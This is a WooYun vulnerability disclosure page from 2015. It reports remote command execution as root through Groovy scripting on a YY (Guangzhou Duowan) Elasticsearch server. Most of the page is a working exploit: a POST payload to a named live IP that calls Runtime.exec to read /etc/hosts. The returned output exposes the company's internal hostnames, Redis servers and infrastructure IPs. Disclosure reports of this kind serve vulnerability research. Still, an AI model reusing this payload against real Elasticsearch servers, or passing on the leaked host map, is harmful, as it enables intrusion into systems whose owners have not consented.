当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099575

漏洞标题:YY(广州多玩)Elasticsearch Groovy任意命令执行(root权限)

相关厂商:广州多玩

漏洞作者: boooooom

提交时间:2015-03-05 09:40

修复时间:2015-03-10 09:42

公开时间:2015-03-10 09:42

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://zone.wooyun.org/content/18915
http://115.238.170.67:9200/_search
POST:

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/hosts\").getInputStream())).readLines()","lang": "groovy"}}}

漏洞证明:

{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":11,"max_score":1.0,"hits":[{"_index":"grafana-dash","_type":"dashboard","_id":"cloud","_score":1.0,"fields":{"iswin":[["127.0.0.1       localhost","127.0.1.1       ubuntu","121.14.241.43 balance.yy.duowan.com","# The following lines are desirable for IPv6 capable hosts","::1     localhost ip6-localhost ip6-loopback","fe00::0 ip6-localnet","ff00::0 ip6-mcastprefix","ff02::1 ip6-allnodes","ff02::2 ip6-allrouters","ff02::3 ip6-allhosts","121.14.37.147    balance.yy.duowan.com","121.14.37.145  smproxy1.yy.duowan.com","61.152.250.207  smproxy2.yy.duowan.com","59.151.23.85  smproxy3.yy.duowan.com","59.151.47.70 sconf.yy.com","### service manager ip ###","### redis ip ###","### service manager ip ###","121.14.37.154   servicemgr.yy.duowan.com","### redis ip ###","58.215.46.59 subcul.redis.yy.com","58.215.46.59 uid2tid.redis.yy.com","220.181.86.221 subcul2.redis.yy.com","220.181.86.221 uid2tid2.redis.yy.com","10.20.81.107 manager.repos.yy.duowan.com","### exuinfo sdbd ip ###","127.0.0.1 service_exuinfo_sdbd.yy.duowan.com","121.14.37.153\tconfig.yy.duowan.com","183.61.2.55 componentsrv.duowan.com","121.14.43.142\toams.yy.duowan.com","220.181.86.207\tsdaemon.yy.duowan.com","121.14.37.153\tsdaemon2.yy.duowan.com","119.147.160.90\tyycookie.yy.duowan.com","121.14.37.153\trdaemon.yy.duowan.com","220.181.86.207\trdaemon2.yy.duowan.com","121.14.37.153\trelayDaemon.yy.duowan.com","220.181.86.207\trelayDaemon2.yy.duowan.com","### add test.new.componentsrv.duowwan.com to local","127.0.0.1       test.new.componentsrv.duowan.com","58.215.46.21 mirror.yy.duowan.com","183.61.143.222\tgit.sysop.duowan.com","221.228.79.31\tbc.yy.duowan.com","221.228.79.32\tbc2.yy.duowan.com","106.38.255.160 servicemgr2.yy.duowan.com","106.38.255.130\toams2.yy.duowan.com"]]}}]}}

修复方案:

http://zone.wooyun.org/content/18894

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-10 09:42

厂商回复:

最新状态:

暂无